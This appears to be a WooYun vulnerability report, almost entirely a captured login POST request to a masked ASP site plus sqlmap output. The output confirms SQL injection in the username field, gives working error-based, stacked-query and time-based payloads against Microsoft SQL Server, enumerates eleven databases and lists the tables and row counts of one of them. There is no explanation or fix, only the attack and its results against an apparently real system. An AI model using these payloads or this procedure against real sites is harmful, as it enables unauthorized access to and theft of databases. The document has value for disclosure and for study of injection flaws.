WooYun.org

POST /index.asp HTTP/1.1
Host: **.**.**.**
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:42.0) Gecko/20100101 Firefox/42.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: http://**.**.**.**/index.asp
Cookie: ASPSESSIONIDASCRTDQR=FKKHDDOAKOMAPIBGLJCDJHKE
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 44
username=123456&userpass=1&B1=%B5%C7++%C2%BC

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
    Type: error-based
    Title: Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause
    Payload: username=123456' AND 8202=CONVERT(INT,(SELECT CHAR(113) CHAR(120) CHAR(122) CHAR(107) C
HAR(113) (SELECT (CASE WHEN (8202=8202) THEN CHAR(49) ELSE CHAR(48) END)) CHAR(113) CHAR(107) CHAR(1
06) CHAR(113) CHAR(113))) AND 'VCxj'='VCxj&userpass=1&B1=%B5%C7  %C2%BC
    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries (comment)
    Payload: username=123456';WAITFOR DELAY '0:0:5'--&userpass=1&B1=%B5%C7  %C2%BC
    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind (comment)
    Payload: username=123456' WAITFOR DELAY '0:0:5'--&userpass=1&B1=%B5%C7  %C2%BC
---
[12:10:52] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2000
[12:10:52] [INFO] fetching database names
[12:10:53] [INFO] heuristics detected web page charset 'GB2312'
[12:10:53] [INFO] the SQL query used returns 11 entries
[12:10:55] [INFO] fetching number of databases
[12:10:55] [WARNING] time-based comparison requires larger statistical model, please wait...........
.......
[12:11:09] [WARNING] it is very important not to stress the network adapter during usage of time-bas
ed payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
 y
11
[12:11:24] [INFO] retrieved:
[12:11:30] [INFO] adjusting time delay to 4 seconds due to good response times
5287835
[12:13:19] [INFO] retrieved: ERP
[12:14:04] [INFO] retrieved: master
[12:15:41] [INFO] retrieved: model
[12:17:12] [INFO] retrieved: msdb
[12:18:19] [INFO] retrieved: Northwind
[12:21:11] [INFO] retrieved: pubs
[12:22:25] [INFO] retrieved: tempdb
[12:24:14] [INFO] retrieved: whdata
[12:25:55] [INFO] retrieved: whqsi
[12:27:22] [INFO] retrieved: xxsgddz
available databases [11]:
[*] 5287835
[*] ERP
[*] master
[*] model
[*] msdb
[*] Northwind
[*] pubs
[*] tempdb
[*] whdata
[*] whqsi
[*] xxsgddz

Database: whqsi
+--------------------+---------+
| Table              | Entries |
+--------------------+---------+
| dbo.tm             | 248136  |
| dbo.nj_jgdm        | 32433   |
| dbo.[nj_jgdm---]   | 29566   |
| dbo.xtcy_nj        | 27784   |
| dbo.xtcy           | 14872   |
| dbo.xtcy_chanpin   | 13941   |
| dbo.nj_px          | 9495    |
| dbo.xtcy070110     | 6600    |
| dbo.nj_ebank       | 3868    |
| dbo.nj_zycp        | 2924    |
| dbo.nj_user        | 2768    |
| dbo.xjjhy          | 1199    |
| dbo.nj_jjhy        | 1047    |
| dbo.spbq           | 493     |
| dbo.nj_gj          | 237     |
| dbo.nj_info        | 96      |
| dbo.nj_net         | 96      |
| dbo.nj_hb          | 34      |
| dbo.nj_jjlx        | 30      |
| dbo.sysconstraints | 15      |
| dbo.nj_jglx        | 12      |
| dbo.dtproperties   | 9       |
| dbo.nj_xzqh        | 6       |
| dbo.tm_user        | 6       |
| dbo.nj_b2b         | 5       |
| dbo.syssegments    | 3       |
+--------------------+---------+